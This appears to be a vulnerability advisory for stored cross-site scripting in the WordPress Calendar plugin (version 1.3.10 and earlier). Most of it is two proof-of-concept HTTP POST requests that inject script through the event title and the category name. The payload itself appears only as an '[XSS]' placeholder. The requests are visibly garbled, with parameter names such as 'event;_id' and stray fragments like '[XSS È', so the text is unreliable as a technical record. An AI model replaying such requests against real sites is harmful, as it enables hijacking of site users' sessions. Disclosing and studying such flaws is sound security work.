Calendar <= 1.3.10 - Authenticated Stored Cross-Site Scripting (XSS)

This WordPress plugin allows remote authenticated users, without the unfiltered_html capability, to execute JavaScript code through stored XSS attack. The plugin by default is available to users with contributor or more privileges.

PoC

POC 1# You can inject JavaScript code into the event title when creating it: POST /wordpress/wp-admin/admin.php?page=calendar HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=calendar&amp;action;=delete&amp;event;_id=3&_wpnonce=cc7cb5ade4 Content-Type: application/x-www-form-urlencoded Content-Length: 375 Connection: close action=add&event;_id=&_wpnonce=4c75b15fa6&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar%26action%3Ddelete%26event_id%3D3%26_wpnonce%3Dcc7cb5ade4&event;_title=%[XSS]&event;_desc=test&event;_category=1&event;_link=&event;_begin=2018-10-30&event;_end=2018-10-30&event;_time=21%3A24&event;_repeats=0&event;_recur=S&save;=Save+%C2%BB POC 2# You can inject JavaScript code into the category name when creating it: POST /wordpress/wp-admin/admin.php?page=calendar-categories HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: Content-Type: application/x-www-form-urlencoded Content-Length: 215 Connection: close mode=add&category;_id=&_wpnonce=fc2e4e9618&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar-categories&category;_name=[XSS È&category;_colour=&save;=Save+%C2%BB